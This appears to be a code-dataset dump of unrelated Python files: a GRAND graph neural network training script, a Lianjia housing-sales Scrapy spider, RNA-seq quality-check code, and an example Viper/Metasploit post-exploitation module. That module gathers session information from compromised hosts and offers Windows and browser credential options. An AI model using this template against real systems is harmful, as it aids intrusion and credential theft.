parser.add_argument('--order', type=int, default=5, help='Propagation step')
parser.add_argument('--sample', type=int, default=4, help='Sampling times of dropnode')
parser.add_argument('--tem', type=float, default=0.5, help='Sharpening temperature')
parser.add_argument('--lam', type=float, default=1., help='Lamda')
parser.add_argument('--dataset', type=str, default='cora', help='Data set')
parser.add_argument('--cuda_device', type=int, default=4, help='Cuda device')
parser.add_argument('--use_bn', action='store_true', default=False, help='Using Batch Normalization')
#dataset = 'citeseer'
#dataset = 'pubmed'
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.cuda.set_device(args.cuda_device)
dataset = args.dataset
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
# Load data
A, features, labels, idx_train, idx_val, idx_test = load_data(dataset)
idx_unlabel = torch.arange(idx_train.shape[0], labels.shape[0], dtype=int)
# Model and optimizer
model = MLP(nfeat=features.shape[1],
nhid=args.hidden,
nclass=labels.max().item() + 1,
input_droprate=args.input_droprate,
hidden_droprate=args.hidden_droprate,
use_bn = args.use_bn)
optimizer = optim.Adam(model.parameters(),
lr=args.lr, weight_decay=args.weight_decay)
if args.cuda:
model.cuda()
features = features.cuda()
A = A.cuda()
labels = labels.cuda()
idx_train = idx_train.cuda()
idx_val = idx_val.cuda()
idx_test = idx_test.cuda()
idx_unlabel = idx_unlabel.cuda()
def propagate(feature, A, order):
    # mixed-order propagation: average the 0..order hop aggregations,
    # i.e. (X + A X + A^2 X + ... + A^order X) / (order + 1)
    #feature = F.dropout(feature, args.dropout, training=training)
    x = feature
    y = feature
    for i in range(order):
        x = torch.spmm(A, x).detach_()
        y.add_(x)
    return y.div_(order+1.0).detach_()
def rand_prop(features, training):
    # DropNode: during training randomly zero entire node feature rows; at inference
    # scale by the keep probability so the expected input matches training
    n = features.shape[0]
    drop_rate = args.dropnode_rate
    drop_rates = torch.FloatTensor(np.ones(n) * drop_rate)
    if training:
        masks = torch.bernoulli(1. - drop_rates).unsqueeze(1)
        features = masks.cuda() * features
    else:
        features = features * (1. - drop_rate)
    features = propagate(features, A, args.order)
    return features
def consis_loss(logps, temp=args.tem):
    # consistency regularization: sharpen the average prediction over the K augmentations
    # and penalize the squared distance of each individual prediction from it
    ps = [torch.exp(p) for p in logps]
    sum_p = 0.
    for p in ps:
        sum_p = sum_p + p
    avg_p = sum_p/len(ps)
    sharp_p = (torch.pow(avg_p, 1./temp) / torch.sum(torch.pow(avg_p, 1./temp), dim=1, keepdim=True)).detach()
    loss = 0.
    for p in ps:
        loss += torch.mean((p-sharp_p).pow(2).sum(1))
    loss = loss/len(ps)
    return args.lam * loss
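# Hedged illustration (added; not part of the original GRAND script): the effect of the
# temperature-sharpening step inside consis_loss on an averaged prediction. The tensor
# values are invented purely for demonstration.
def _sharpen_example(temp=0.5):
    avg_p = torch.tensor([[0.6, 0.3, 0.1]])
    sharp_p = torch.pow(avg_p, 1. / temp) / torch.sum(torch.pow(avg_p, 1. / temp), dim=1, keepdim=True)
    return sharp_p  # roughly [[0.78, 0.20, 0.02]]: probability mass is pushed toward the dominant class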
def train(epoch):
t = time.time()
X = features
model.train()
optimizer.zero_grad()
X_list = []
K = args.sample
for k in range(K):
X_list.append(rand_prop(X, training=True))
output_list = []
for k in range(K):
output_list.append(torch.log_softmax(model(X_list[k]), dim=-1))
loss_train = 0.
for k in range(K):
loss_train += F.nll_loss(output_list[k][idx_train], labels[idx_train])
loss_train = loss_train/K
#loss_train = F.nll_loss(output_1[idx_train], labels[idx_train]) + F.nll_loss(output_1[idx_train], labels[idx_train])
#loss_js = js_loss(output_1[idx_unlabel], output_2[idx_unlabel])
#loss_en = entropy_loss(output_1[idx_unlabel]) + entropy_loss(output_2[idx_unlabel])
loss_consis = consis_loss(output_list)
loss_train = loss_train + loss_consis
acc_train = accuracy(output_list[0][idx_train], labels[idx_train])
loss_train.backward()
optimizer.step()
if not args.fastmode:
model.eval()
X = rand_prop(X,training=False)
output = model(X)
output = torch.log_softmax(output, dim=-1)
loss_val = F.nll_loss(output[idx_val], labels[idx_val])
acc_val = accuracy(output[idx_val], labels[idx_val])
print('Epoch: {:04d}'.format(epoch+1),
'loss_train: {:.4f}'.format(loss_train.item()),
'acc_train: {:.4f}'.format(acc_train.item()),
'loss_val: {:.4f}'.format(loss_val.item()),
'acc_val: {:.4f}'.format(acc_val.item()),
'time: {:.4f}s'.format(time.time() - t))
return loss_val.item(), acc_val.item()
def Train():
# Train model
t_total = time.time()
loss_values = []
acc_values = []
bad_counter = 0
# best = args.epochs + 1
loss_best = np.inf
acc_best = 0.0
loss_mn = np.inf
acc_mx = 0.0
best_epoch = 0
for epoch in range(args.epochs):
# if epoch < 200:
# l, a = train(epoch, True)
# loss_values.append(l)
# acc_values.append(a)
# continue
l, a = train(epoch)
loss_values.append(l)
acc_values.append(a)
print(bad_counter)
if loss_values[-1] <= loss_mn or acc_values[-1] >= acc_mx:# or epoch < 400:
if loss_values[-1] <= loss_best: #and acc_values[-1] >= acc_best:
loss_best = loss_values[-1]
acc_best = acc_values[-1]
best_epoch = epoch
torch.save(model.state_dict(), dataset +'.pkl')
loss_mn = np.min((loss_values[-1], loss_mn))
acc_mx = np.max((acc_values[-1], acc_mx))
bad_counter = 0
else:
bad_counter += 1
# print(bad_counter, loss_mn, acc_mx, loss_best, acc_best, best_epoch)
if bad_counter == args.patience:
print('Early stop! Min loss: ', loss_mn, ', Max accuracy: ', acc_mx)
print('Early stop model validation loss: ', loss_best, ', accuracy: ', acc_best)
break
print("Optimization Finished!")
print("Total time elapsed: {:.4f}s".format(time.time() - t_total))
# Restore best model
print('Loading {}th epoch'.format(best_epoch))
model.load_state_dict(torch.load(dataset +'.pkl'))
def test():
model.eval()
X = features
X = rand_prop(X, training=False)
output = model(X)
output = torch.log_softmax(output, dim=-1)
loss_test = F.nll_loss(output[idx_test], labels[idx_test])
acc_test = accuracy(output[idx_test], labels[idx_test])
print("Test set results:",
"loss= {:.4f}".format(loss_test.item()),
"accuracy= {:.4f}".format(acc_test.item()))
Train()
test()
| StarcoderdataPython |
3274340 | # -*- coding: utf-8 -*-
import scrapy
import re
import datetime
from ..items import LianjiaChengjiaoItem
class ChengjiaoSpider(scrapy.Spider):
name = 'chengjiao'
allowed_domains = ['cd.lianjia.com']
start_url = "https://cd.lianjia.com/xiaoqu/"
    # paginated listing page of residential communities under a sub-district
next_region_url = "https://cd.lianjia.com{}pg{}/"
    # sold-listings (chengjiao) page for a community
solded_url = "https://cd.lianjia.com/chengjiao/pg{}c{}/"
def start_requests(self):
yield scrapy.Request(self.start_url,callback=self.parse)
    # parse the main district links, e.g. Jinjiang District, Chenghua District
def parse(self, response):
regions = response.xpath("//div[@data-role='ershoufang']/div/a/@href").extract()
for region in regions:
region_url = "https://cd.lianjia.com" + region
yield scrapy.Request(region_url, callback=self.parse_region)
    # parse the sub-district links, e.g. Chuanda, Hongpailou
def parse_region(self, response):
next_regions = response.xpath("//div[@data-role='ershoufang']/div[2]/a/@href").extract()
for next_region in next_regions:
yield scrapy.Request(self.next_region_url.format(next_region, 1), meta={"page": 1,"next_region":next_region}, callback=self.parse_next_region)
    # parse the residential-community links under a sub-district, e.g. Chuanda Garden
def parse_next_region(self, response):
        # current page number
page = int(response.meta.get("page"))
next_region = response.meta.get("next_region")
next_region_name = response.meta.get("next_region_name")
items = response.xpath("//ul[@class='listContent']/li")
for item in items:
            # get the community id
village_id = item.xpath("./@data-id").extract_first()
            # get the community's main district
region = item.xpath(".//a[@class='district']/text()").extract_first().strip()
            # get the community's sub-district
next_region_name = item.xpath(".//a[@class='bizcircle']/text()").extract_first().strip()
yield scrapy.Request(self.solded_url.format(1, village_id), callback=self.parse_solded_page,
meta={"village_id": village_id, "region": region, "next_region": next_region,"page": 1, "next_region_name":next_region_name})
        # total is the number of communities in this sub-district
total = response.xpath("//div[@class='resultDes clear']/h2[@class='total fl']/span/text()").extract_first().strip()
        # number of result pages (30 items per page); may be fractional, used as the pagination limit
ave_page = int(total)/30
if page < ave_page:
page += 1
yield scrapy.Request(self.next_region_url.format(next_region, page), callback=self.parse_next_region,
meta={"page": page, "next_region": next_region})
    # parse the sold-listing details for a community
def parse_solded_page(self, response):
page = int(response.meta.get("page"))
village_id = response.meta.get("village_id")
region = response.meta.get("region")
next_region_name = response.meta.get("next_region_name")
next_region = response.meta.get("next_region")
total_num = int(response.xpath("//div[@class='total fl']/span/text()").extract_first().strip())
if total_num != 0:
items = response.xpath("//ul[@class='listContent']/li")
for item in items:
i = LianjiaChengjiaoItem()
title = item.xpath(".//div[@class='title']/a/text()").extract_first()
if "车位" not in title:
village_name = title.split(" ")[0]
room_num = title.split(" ")[1]
area = title.split(" ")[2]
price_info = item.xpath(".//div[@class='totalPrice']/span/text()").extract_first()
if "*" in price_info:
total_price = item.xpath(".//span[@class='dealCycleTxt']/span[1]/text()").extract_first().split("牌")[1].split("万")[0]
push_time = str(datetime.date.today())
else:
total_price = price_info.split("万")[0].strip()
                        push_time = item.xpath(".//div[@class='dealDate']/text()").extract_first().replace(".", "-")
try:
total_time = item.xpath(".//span[@class='dealCycleTxt']/span[2]/text()").extract_first()
i['total_time'] = int(total_time.split("期")[1].split("天")[0])
except:
total_time = item.xpath(".//span[@class='dealCycleTxt']/span/text()").extract_first()
i['total_time'] = int(total_time.split("期")[1].split("天")[0])
house_info = item.xpath(".//div[@class='houseInfo']/text()").extract_first()
i['village_id'] = village_id
i['region'] = region
i['next_region_name'] = next_region_name
i['village_name'] = village_name
i['room_num'] = room_num
i['area'] = float(area.split("平")[0])
i['total_price'] = int(float(total_price)*10000)
i['push_time'] = push_time
i["forward"] = house_info.split("|")[0].strip()
i["elevator"] = house_info.split("|")[-1].strip()
i["url"] = response.url
i["unit_price"] = int((float(total_price)*10000)/(float(area.split("平")[0])))
yield i
ave_page = total_num/30
if page < ave_page:
page += 1
yield scrapy.Request(self.solded_url.format(page, village_id), callback=self.parse_solded_page,
meta={"village_id": village_id, "region": region, "next_region": next_region,"page": page,'next_region_name':next_region_name}) | StarcoderdataPython |
50097 | <reponame>evi1hack/viperpython
# -*- coding: utf-8 -*-
# @File : SimpleRewMsfModule.py
# @Date : 2019/1/11
# @Desc :
#
#
from PostModule.lib.Configs import *
from PostModule.lib.ModuleTemplate import TAG2CH, PostMSFRawModule
from PostModule.lib.OptionAndResult import Option, register_options
# from PostModule.lib.Session import Session
class PostModule(PostMSFRawModule):
    NAME = "Raw MSF module example"
    DESC = "An example of a raw MSF module; it runs the multi/gather/session_info module"
REQUIRE_SESSION = True
MODULETYPE = TAG2CH.example
OPTIONS = register_options([
        Option(name='StrTest', name_tag="String test", type='str', required=False, desc="Test a string parameter", ),
        Option(name='BoolTest', name_tag="Bool test", type='bool', required=False, desc="Test a bool parameter", default=False),
        Option(name='IntgerTest', name_tag="Integer test", type='integer', required=False, desc="Test an integer parameter"),
        Option(name='EnumTest', name_tag="Enum test", type='enum', required=False, desc="Test an enum parameter", default='test1',
               enum_list=['test1', 'test2', 'test3']),
Option(name=HANDLER_OPTION.get('name'), name_tag=HANDLER_OPTION.get('name_tag'),
type=HANDLER_OPTION.get('type'), required=False,
desc=HANDLER_OPTION.get('desc'),
enum_list=[], option_length=HANDLER_OPTION.get('option_length')),
Option(name=CREDENTIAL_OPTION.get('name'), name_tag=CREDENTIAL_OPTION.get('name_tag'),
type=CREDENTIAL_OPTION.get('type'),
required=False,
desc=CREDENTIAL_OPTION.get('desc'),
enum_list=[],
option_length=CREDENTIAL_OPTION.get('option_length'),
extra_data={'password_type': ['windows', 'browsers']}
),
])
def __init__(self, sessionid, hid, custom_param):
super().__init__(sessionid, hid, custom_param)
self.type = "post"
self.mname = "multi/gather/session_info"
self.runasjob = True
    def check(self):
        """Pre-execution check function"""
return True, None
def callback(self, status, message, data):
print(status)
print(message)
print(data)
| StarcoderdataPython |
1749506 | <reponame>J-81/dp_tools
from collections import defaultdict
import copy
import enum
import gzip
import logging
import math
from pathlib import Path
from statistics import mean, median, stdev
import subprocess
from typing import Callable, DefaultDict, Dict, List, Set, Tuple, Union
import pandas as pd
from dp_tools.components.components import GenomeAlignments, RawReadsComponent
from dp_tools.core.entity_model import (
DataDir,
DataFile,
ModuleLevelMQC,
TemplateDataset,
TemplateSample,
)
log = logging.getLogger(__name__)
from dp_tools.core.check_model import Check, Flag, FlagCode
# adapted from reference: https://stackoverflow.com/questions/56048627/round-floats-in-a-nested-dictionary-recursively
# used to round values for easier to read messages
def formatfloat(x):
return "%.3g" % float(x)
def pformat(original_dictionary, function):
dictionary = copy.deepcopy(
original_dictionary
) # we don't want to override original values
if isinstance(dictionary, dict):
new_dict = dict()
for k, v in dictionary.items():
new_dict[k] = function(v) if isinstance(v, float) else pformat(v, function)
return new_dict
return dictionary
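# Hedged illustration (added): pformat applied to a nested outlier-style dictionary with
# invented values; formatfloat shortens the floats so flag messages stay readable.
def _pformat_example() -> dict:
    outliers = {"total_sequences": {"sample1": 2.345678, "sample2": -4.0123456}}
    return pformat(outliers, formatfloat)  # -> {'total_sequences': {'sample1': '2.35', 'sample2': '-4.01'}}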
class MIDDLE(enum.Enum):
mean: Tuple[Callable] = (mean,)
median: Tuple[Callable] = (median,)
def __call__(self, *args, **kwargs):
return self.value[0](*args, **kwargs)
def identify_outliers(
valueDict: Dict[str, float], standard_deviation_threshold: float, middle: Callable
):
# determine middle value
middle_value: float = middle(valueDict.values())
std_deviation: float = stdev(valueDict.values())
# init tracker
# holds the key name and the standard deviations from the middle
outliers: Dict[str, float] = dict()
# exit early if std_deviation is zero (i.e. no outliers)
if std_deviation == 0:
return outliers
# check if a value is an outlier
for key, value in valueDict.items():
# calculate standard deviations
num_std_deviations_vector = (value - middle_value) / std_deviation
# if an outlier, add it to a dict of outliers (include a +/- standard deviations)
if abs(num_std_deviations_vector) > standard_deviation_threshold:
outliers[key] = num_std_deviations_vector
return outliers
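# Hedged usage sketch (added): identify_outliers on an invented sample-to-count mapping.
# The last sample sits about 2.4 sample standard deviations above the median, so it is the
# only entry returned (mapped to its signed deviation).
def _identify_outliers_example() -> Dict[str, float]:
    toy_counts = {"s1": 10.0, "s2": 10.0, "s3": 10.0, "s4": 10.0, "s5": 10.0, "s6": 100.0}
    return identify_outliers(toy_counts, standard_deviation_threshold=2, middle=MIDDLE.median)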
# TODO: typedict for thresholds
def identify_values_past_thresholds(thresholds: dict, value: float) -> List[FlagCode]:
"""Return empty list if no codes are raised"""
VALID_THRESHOLD_TYPES = {"lower", "upper"}
new_codes = list()
for threshold in thresholds:
assert (
threshold.get("type") in VALID_THRESHOLD_TYPES
), f"Invalid threshold type configured: valid options {VALID_THRESHOLD_TYPES} got {threshold.get('type')}"
if threshold.get("type") == "lower":
if value < threshold["value"]:
new_codes.append(threshold["code"])
elif threshold.get("type") == "upper":
if value > threshold["value"]:
new_codes.append(threshold["code"])
return new_codes
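# Hedged illustration (added): how identify_values_past_thresholds reads the threshold
# dictionaries used in the check configs below; the cutoff values here are invented.
def _thresholds_example() -> List[FlagCode]:
    thresholds = [
        {"code": FlagCode.YELLOW1, "type": "lower", "value": 70},
        {"code": FlagCode.RED1, "type": "lower", "value": 50},
    ]
    return identify_values_past_thresholds(thresholds, value=60)  # -> [FlagCode.YELLOW1]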
def convert_nan_to_zero(input: Dict[str, Union[float, int]]) -> Dict:
"""Convert any Nan into zero"""
output = dict()
for key, value in input.items():
output[key] = value if not math.isnan(value) else 0
return output
## Functions that use the following syntax to merge values from general stats:
# "stat1 + stat2" should search and sum the stats
def stat_string_to_value(stat_string: str, mqcData: ModuleLevelMQC) -> float:
""" "stat1 + stat2" should search and sum the stats"""
sum = float(0)
direct_keys = stat_string.split(" + ")
for direct_key in direct_keys:
sum += mqcData["General_Stats"][direct_key]
return sum
## Dataframe and Series specific helper functions
def nonNull(df: pd.DataFrame) -> bool:
# negation since it checks if any are null
return ~df.isnull().any(axis=None)
def nonNegative(df: pd.DataFrame) -> bool:
"""This ignores null values, use nonNull to validate that condition"""
return ((df >= 0) | (df.isnull())).all(axis=None)
def onlyAllowedValues(df: pd.DataFrame, allowed_values: list) -> bool:
"""This ignores null values, use nonNull to validate that condition"""
return ((df.isin(allowed_values)) | (df.isnull())).all(axis=None)
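# Hedged illustration (added): the three DataFrame helpers above applied to a tiny invented
# table; None marks a missing value, which nonNegative and onlyAllowedValues ignore.
def _dataframe_helpers_example() -> Tuple[bool, bool, bool]:
    df = pd.DataFrame({"a": [1, 2, None], "b": [0, 5, 3]})
    # -> (False, True, True): one null present, no negatives, all non-null values allowed
    return nonNull(df), nonNegative(df), onlyAllowedValues(df, [0, 1, 2, 3, 5])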
class SAMPLE_RAWREADS_0001(Check):
    description = (
        "Check that appropriate raw reads components exist. Also check that "
        "all datafiles associated with the components are present. "
        "For paired end studies, this means both rawForwardReads and rawReverseReads "
        "are attached components. For single end studies, "
        "this means the rawReads component is attached. "
        "For paired end studies, confirms that forward and reverse read counts match."
    )
flag_desc = {
FlagCode.GREEN: "All expected raw read files present",
FlagCode.HALT1: "Missing expected components: {missing_components}",
        FlagCode.HALT2: "Forward and reverse read counts differ. Forward: ({forward_read_count}) Reverse: ({reverse_read_count})",
FlagCode.DEV_HANDLED: "Searched for component, but component was not expected by entity model: {unexpected_components}",
}
def validate_func(self, sample: TemplateSample) -> Flag:
# assume passing unless a flag condition arises
code = FlagCode.GREEN
# set branching informative parameters based on layout
if sample.dataset.metadata.paired_end:
expected_components = ["rawForwardReads", "rawReverseReads"]
check_read_parity = True
else:
expected_components = ["rawReads"]
check_read_parity = False
missing_components = list()
unexpected_components = list()
for expected_component in expected_components:
component = getattr(sample, expected_component, None)
if component == None:
unexpected_components.append(expected_component)
if not isinstance(component, RawReadsComponent):
missing_components.append(expected_component)
if unexpected_components:
code = FlagCode.DEV_HANDLED
if missing_components:
code = FlagCode.HALT1
# check parity
if all([check_read_parity, code == FlagCode.GREEN]):
if (
not sample.rawForwardReads.mqcData["FastQC"]["General_Stats"][
"total_sequences"
]
== sample.rawReverseReads.mqcData["FastQC"]["General_Stats"][
"total_sequences"
]
):
code = FlagCode.HALT2
return Flag(
check=self,
codes=code,
message_args={
"missing_components": missing_components,
"forward_read_count": sample.rawForwardReads.mqcData["FastQC"][
"General_Stats"
]["total_sequences"]
if code == FlagCode.HALT2
else None,
"reverse_read_count": sample.rawReverseReads.mqcData["FastQC"][
"General_Stats"
]["total_sequences"]
if code == FlagCode.HALT2
else None,
},
)
class SAMPLE_TRIMREADS_0001(SAMPLE_RAWREADS_0001):
...
class COMPONENT_RAWREADS_0001(Check):
config = {
"lines_to_check": 200_000_000,
# attributes names
"expected_data_files": [
"fastqGZ",
"fastQCmultiQCDirZIP",
"fastqcReportHTML",
"fastqcReportZIP",
],
}
    description = (
        "Confirms that all read components (e.g. rawForwardReads, trimmedReads) include the following: "
"Datafiles of the format: {expected_data_files} related to the reads component. "
"Additionally, the following checks are performed for each file type: "
"\tfastq.gz: First {lines_to_check} lines are checked for correct format. "
)
flag_desc = {
FlagCode.GREEN: "Component passes all validation requirements.",
FlagCode.HALT1: "Missing expected files: {missing_files}",
FlagCode.HALT2: "Fastq.gz file has issues on lines: {lines_with_issues}",
FlagCode.HALT3: "Corrupted Fastq.gz file suspected, last line number encountered: {last_line_checked}",
}
def validate_func(self: Check, component) -> Flag:
"""Checks fastq lines for expected header content
Note: Example of header from GLDS-194
| ``@J00113:376:HMJMYBBXX:3:1101:26666:1244 1:N:0:NCGCTCGA\n``
This also assumes the fastq file does NOT split sequence or quality lines
for any read
:param component: A ReadsComponent
"""
# assume passing first
# overwrite if flag conditions met
code = FlagCode.GREEN
# Subcheck: 1 ( can trigger HALT1 )
# check if expected files exist first
missing_files: List[Path] = list()
lines_with_issues: List[int] = list()
i = 0
for expected_file in self.config["expected_data_files"]:
try:
# check the attribute is exists and is of the proper type
assert any(
[
isinstance(getattr(component, expected_file), DataFile),
isinstance(getattr(component, expected_file), DataDir),
]
)
# check the path exists
assert getattr(component, expected_file).path.exists()
except AssertionError:
code = FlagCode.HALT1
missing_files.append(expected_file)
# check if exiting makes sense before next checks
if code != FlagCode.GREEN:
return Flag(
check=self,
codes=code,
message_args={
"lines_with_issues": lines_with_issues,
"last_line_checked": i,
"missing_files": missing_files,
},
)
# subcheck: 2 ( can trigger HALT2,HALT3 )
# check fastq.gz file looks correct
file = component.fastqGZ.path
count_lines_to_check = self.config["lines_to_check"]
if count_lines_to_check == -1:
count_lines_to_check = float("inf")
# truncated files raise EOFError
# catch this as HALT3
try:
with gzip.open(file, "rb") as f:
for i, line in enumerate(f):
# checks if lines counted equals the limit input
if i + 1 == count_lines_to_check:
log.debug(
f"Reached {count_lines_to_check} lines, ending line check"
)
break
line = line.decode()
# every fourth line should be an identifier
expected_identifier_line = i % 4 == 0
# check if line is actually an identifier line
if expected_identifier_line and line[0] != "@":
lines_with_issues.append(i + 1)
# update every 20,000,000 reads
if i % 20_000_000 == 0:
log.debug(f"Checked {i} lines for {file}")
pass
if not len(lines_with_issues) == 0:
code = FlagCode.HALT2
except (EOFError, gzip.BadGzipFile):
code = FlagCode.HALT3
# return flag
return Flag(
check=self,
codes=code,
message_args={
"lines_with_issues": lines_with_issues,
"last_line_checked": i,
"missing_files": missing_files,
},
)
class COMPONENT_TRIMREADS_0001(COMPONENT_RAWREADS_0001):
config = {
"lines_to_check": 200_000_000,
"expected_data_files": [
"fastqGZ",
"fastQCmultiQCDirZIP",
"fastqcReportHTML",
"fastqcReportZIP",
"trimmingReportTXT",
],
}
class COMPONENT_GENOMEALIGNMENTS_0001(Check):
config = {
"expected_files": {
"alignedToTranscriptomeBam": {"samtoolsQuickCheck": True},
"alignedSortedByCoordBam": {"samtoolsQuickCheck": True},
"alignedSortedByCoordResortedBam": {"samtoolsQuickCheck": True},
"alignedSortedByCoordResortedBamIndex": {},
"logFinal": {},
"logProgress": {},
"logFull": {},
"sjTab": {},
},
# Will use the following syntax for combined metrics
# 'metric1' + 'metric2' + 'metric3'
# valid types: 'upper', 'lower'
"general_stats_metrics": {
"uniquely_mapped_percent + multimapped_percent": [
{"code": FlagCode.YELLOW1, "type": "lower", "value": 70},
{"code": FlagCode.RED1, "type": "lower", "value": 50},
],
# DISCUSS: this seems an odd check. Recommending modification
# Maybe combine with other metrics for more meaningful assessment
# Ref: https://github.com/J-81/JDO_V-V/blob/b3e0f4734eedabaa7ec99119073cf4e263f0963d/CHECKS.md?plain=1#L192
"multimapped_toomany_percent + multimapped_percent": [
{"code": FlagCode.YELLOW1, "type": "lower", "value": 30},
{"code": FlagCode.RED1, "type": "lower", "value": 15},
],
},
}
    description = (
        "Check that the following files exist: {expected_files} "
        "Beyond existence, validating that the files are not corrupt needs to be performed external to this automated V&V program. "
"Specifically, bam files can be validated using samtools quickcheck (see: http://www.htslib.org/doc/samtools-quickcheck.html) "
""
)
flag_desc = {
FlagCode.GREEN: "Component passes all validation requirements.",
FlagCode.YELLOW1: "Found values beyond defined yellow thresholds: {flagged_values} -> {threshold_config}",
FlagCode.RED1: "Found values beyond defined red thresholds: {flagged_values} -> {threshold_config}",
FlagCode.HALT1: "Missing expected files: {missing_files}",
}
def UNIMPLEMENTED_samtoolsQuickCheck(self, bamFile: Path) -> str:
"""
This function is deprecated until getting subprocesses to use conda envs is properly implemented
Returns error message if an issue is found, empty string otherwise
"""
# check with coord file with samtools
process = subprocess.Popen(
["samtools", "quickcheck", bamFile],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout, stderr = process.communicate()
return stderr.decode()
def validate_func(
self: Check, component: GenomeAlignments, mqc_name: str = "STAR"
) -> Flag:
codes = {FlagCode.GREEN}
missing_files = list()
flagged_values = dict()
for expected_file, constraints in self.config["expected_files"].items(): # type: ignore
# check exists
if not getattr(component, expected_file).path.is_file():
codes.add(FlagCode.HALT1)
missing_files.append(expected_file)
# check with samtools (as per "samtoolsQuickCheck")
# if constraints.get("samtoolsQuickCheck"):
# self._samtoolsQuickCheck(getattr(component, expected_file).path)
for key, thresholds in self.config["general_stats_metrics"].items(): # type: ignore
# key may be a direct general stats key or a stat_string
# check if direct key
            value = component.mqcData[mqc_name].get(key, None)
            if value is None:
                # not a direct key, treat it as a stat_string (e.g. "stat1 + stat2")
                value = stat_string_to_value(key, component.mqcData[mqc_name])
# check against thresholds
# yellow level outliers
if new_codes := identify_values_past_thresholds(thresholds, value):
# add highest severity new code
codes.add(max(new_codes))
flagged_values[key] = value
return Flag(
check=self,
codes=codes,
message_args={
"missing_files": missing_files,
"threshold_config": self.config["general_stats_metrics"],
"flagged_values": flagged_values,
},
)
class DATASET_METADATA_0001(Check):
config = {"expected_metadata_attrs": ["paired_end", "has_ercc"]}
    description = "Checks and reports expected metadata required for processing"
flag_desc = {
FlagCode.GREEN: "All expected metadata is accessible and populated. {actual_metadata_fields}",
FlagCode.HALT1: "Missing expected metadata fields: {missing_metadata_fields}",
}
def validate_func(self, dataset: TemplateDataset) -> Flag:
# assume green unless flag condition met
code = FlagCode.GREEN
# set up tracker for expected attributes values
tracked_metadata = dict()
# and a tracker for missing attributes
missing_metadata_fields = list()
for attr in self.config["expected_metadata_attrs"]:
attr_value = getattr(dataset.metadata, attr, None)
if attr_value != None:
tracked_metadata[attr] = attr_value
else:
missing_metadata_fields.append(attr)
# check if any missing_metadata_fields are present
if missing_metadata_fields:
code = FlagCode.HALT1
return Flag(
check=self,
codes=code,
message_args={
"actual_metadata_fields": tracked_metadata,
"missing_metadata_fields": missing_metadata_fields,
},
)
class DATASET_RAWREADS_0001(Check):
config = {
"metrics": [
"percent_gc",
"avg_sequence_length",
"total_sequences",
"percent_duplicates",
# "percent_fails", number of failed FastQC submodules, not a very useful metric for BulkRNASeq
],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
"target_components_by_paired_end": {
True: ["rawForwardReads", "rawReverseReads"],
False: ["rawReads"],
},
}
    description = (
        "Check that the reads stats (sourced from FastQC) have no outliers among samples "
        "for the following metrics: {metrics}. "
        "Yellow Flagged Outliers are defined as being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
        "deviations away from the {middle.name}. "
        "Red Flagged Outliers are defined as being {red_standard_deviation_threshold}+ standard "
        "deviations away from the {middle.name}. "
    )
flag_desc = {
FlagCode.GREEN: "No reads metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
code = FlagCode.GREEN
# pull variables from config
metrics = self.config["metrics"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# determine reads components in samples
readsComponents = self.config["target_components_by_paired_end"][
dataset.metadata.paired_end
]
def format_identifier(sample_name: str, component_str: str) -> str:
"""Add forward and reverse suffix if paired end, add nothing otherwise"""
return (
f"{sample_name}:{component_str}"
if dataset.metadata.paired_end
else sample_name
)
# iterate through metrics (here all pulled from FastQC general stats)
for readComponent in readsComponents:
for metric in metrics:
sampleToMetric: Dict[str, float] = {
format_identifier(s.name, readComponent): getattr(
s, readComponent
).mqcData["FastQC"]["General_Stats"][metric]
for s in dataset.samples.values()
}
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetric = convert_nan_to_zero(sampleToMetric)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if code < FlagCode.YELLOW1:
code = FlagCode.YELLOW1
outliers[metric] = outliers[metric] | outliersForThisMetric
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if code < FlagCode.RED1:
code = FlagCode.RED1
outliers[metric] = outliers[metric] | outliersForThisMetric
return Flag(
codes=code,
check=self,
message_args={
"outliers": outliers,
"metrics": metrics,
"formatted_outliers": pformat(outliers, formatfloat),
},
)
class DATASET_TRIMREADS_0001(DATASET_RAWREADS_0001):
# overwrite specific config only
config = DATASET_RAWREADS_0001.config | {
"target_components_by_paired_end": {
True: ["trimForwardReads", "trimReverseReads"],
False: ["trimReads"],
}
}
class DATASET_GENOMEALIGNMENTS_0001(Check):
config = {
"metrics": [
# "total_reads", # check in FastQC, but is used to normalize
# "avg_input_read_length",
# "uniquely_mapped", # redundant with better metric of percent
"uniquely_mapped_percent",
"avg_mapped_read_length",
# "num_splices",
# "num_annotated_splices",
# "num_GTAG_splices",
# "num_GCAG_splices",
# "num_ATAC_splices",
# "num_noncanonical_splices",
"mismatch_rate",
"deletion_rate",
"deletion_length",
"insertion_rate",
"insertion_length",
# "multimapped", # redundant with better metric of percent
"multimapped_percent",
# "multimapped_toomany", # redundant with better metric of percent
"multimapped_toomany_percent",
"unmapped_mismatches_percent",
"unmapped_tooshort_percent",
"unmapped_other_percent",
# "unmapped_mismatches", # redundant with better metric of percent
# "unmapped_tooshort", # redundant with better metric of percent
# "unmapped_other", # redundant with better metric of percent
],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
}
    description = (
        "Check that the genome alignment stats (sourced from the STAR logs) have no outliers among samples "
        "for the following metrics: {metrics}. "
        "Yellow Flagged Outliers are defined as being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
        "deviations away from the {middle.name}. "
        "Red Flagged Outliers are defined as being {red_standard_deviation_threshold}+ standard "
        "deviations away from the {middle.name}. "
    )
flag_desc = {
